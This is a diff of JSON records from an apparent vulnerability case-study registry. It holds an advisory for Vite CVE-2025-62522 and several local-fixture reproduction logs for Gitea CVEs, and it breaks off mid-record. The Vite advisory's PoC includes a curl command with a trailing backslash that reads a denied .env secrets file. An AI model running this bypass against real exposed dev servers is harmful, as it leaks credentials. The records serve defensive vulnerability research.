"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,81 +0,0 @@
{
"canonical_id": "vite--CVE-2025-62522",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "vite allows server.fs.deny bypass via backslash on Windows",
"summary": "### Summary\nFiles denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\\` when the dev server is running on Windows.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the dev server on Windows\n\n### Details\n`server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`.\n\n### PoC\n```shell\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env\\ http://localhost:5173\n```\n<img width=\"1593\" height=\"616\" alt=\"image\" src=\"https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175\" />",
"published_at": "2025-10-20T19:54:28Z",
"updated_at": "2026-02-04T04:13:38.886554Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-62522",
"https://github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-62522",
"GHSA-93m4-6634-74q7"
],
"cve_ids": [
"CVE-2025-62522"
],
"ghsa_ids": [
"GHSA-93m4-6634-74q7"
],
"osv_ids": [
"GHSA-93m4-6634-74q7"
],
"affected_versions": [
"introduced=7.1.0, fixed<7.1.11",
"introduced=7.0.0, fixed<7.0.8",
"introduced=6.0.0, fixed<6.4.1",
"introduced=2.9.18, fixed<5.4.21",
"introduced=3.2.9, fixed<5.4.21",
"introduced=4.5.3, fixed<5.4.21",
"introduced=5.2.6, fixed<5.4.21"
],
"fixed_versions": [
"7.1.11",
"7.0.8",
"6.4.1",
"5.4.21"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "file-upload-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -0,0 +1,145 @@
{
"run_id": "gitea-gitea--CVE-2018-15192-20260318012749",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2018-15192",
"repro_profile_id": "gitea-ssrf",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.ssrf",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json"
}
],
"browser_refs": [],
"browser_evidence": {
"required": false,
"present": false,
"refs": [],
"baseline_refs": [],
"proof_refs": [],
"baseline_title": null,
"proof_title": null,
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:27:49+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2018-15192"
},
{
"at": "2026-03-18T01:27:49+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-ssrf"
},
{
"at": "2026-03-18T01:27:49+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:27:54+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:27:54+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2018-15192-20260318012749"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "server-side callback reached the local sink"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:27:49+00:00",
"finished_at": "2026-03-18T01:27:54+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd"
}
}
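Review bot: Every artifact reference in this run record (`baseline_refs`, `result_path`, `container_log_refs`, `request_log_refs`, `compose_refs`, `report_refs`) is an absolute workstation path under `/Users/x/websafe/...`, so the record only resolves on the machine that produced it and dangles for anyone consuming the registry elsewhere or in CI; storing paths relative to the repository root, e.g. `"bundle_dir": "06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749"` with the other refs relative to it, would make the evidence portable. Separately, `"verification_status": "verified-real"` and `"verification_mode": "real"` sit next to `"artifact_mode": "local-fixture"` and a `success_evaluation` whose only runner assertion is "server-side callback reached the local sink", which reads as a fixture demonstration rather than a reproduction against the affected Gitea build; if "verified-real" is meant to assert the latter, the record should name the image or version exercised (only the compose service `app` is listed), otherwise a consumer cannot tell the two apart. As a minor consistency point, the `provision-compose-environment` timeline entry uses `"status": "ready"` while every other step uses `"completed"`, which makes `status` a mixed enum for the same field. The same three points apply to the run records at L3841–4037, L4042–4238 and L4243–4439.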


@@ -0,0 +1,197 @@
{
"run_id": "gitea-gitea--CVE-2018-18926-20260318012526",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2018-18926",
"repro_profile_id": "gitea-proxy-boundary",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.proxy-boundary",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
],
"baseline_title": "Gitea Proxy Boundary Fixture",
"proof_title": "Gitea Proxy Boundary Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:25:26+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2018-18926"
},
{
"at": "2026-03-18T01:25:26+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-proxy-boundary"
},
{
"at": "2026-03-18T01:25:27+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:25:41+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:25:43+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:25:43+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:25:45+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:25:45+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2018-18926-20260318012526"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "trusted forwarded headers crossed the boundary"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:25:26+00:00",
"finished_at": "2026-03-18T01:25:45+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd"
}
}


@@ -0,0 +1,197 @@
{
"run_id": "gitea-gitea--CVE-2019-1010261-20260318012624",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2019-1010261",
"repro_profile_id": "gitea-xss",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.xss",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
],
"baseline_title": "Gitea Stored XSS Fixture",
"proof_title": "Gitea Stored XSS Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:26:24+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2019-1010261"
},
{
"at": "2026-03-18T01:26:24+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-xss"
},
{
"at": "2026-03-18T01:26:24+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:26:27+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:26:27+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:26:27+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:26:27+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:26:28+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:26:28+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:26:29+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:26:29+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:26:30+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:26:30+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2019-1010261-20260318012624"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "stored payload rendered inside the browser proof page"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:26:24+00:00",
"finished_at": "2026-03-18T01:26:30+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd"
}
}


@@ -0,0 +1,197 @@
{
"run_id": "gitea-gitea--CVE-2020-13246-20260318012806",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2020-13246",
"repro_profile_id": "gitea-proxy-boundary",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.proxy-boundary",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
],
"baseline_title": "Gitea Proxy Boundary Fixture",
"proof_title": "Gitea Proxy Boundary Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:28:06+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2020-13246"
},
{
"at": "2026-03-18T01:28:06+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-proxy-boundary"
},
{
"at": "2026-03-18T01:28:07+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:11+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:11+00:00",
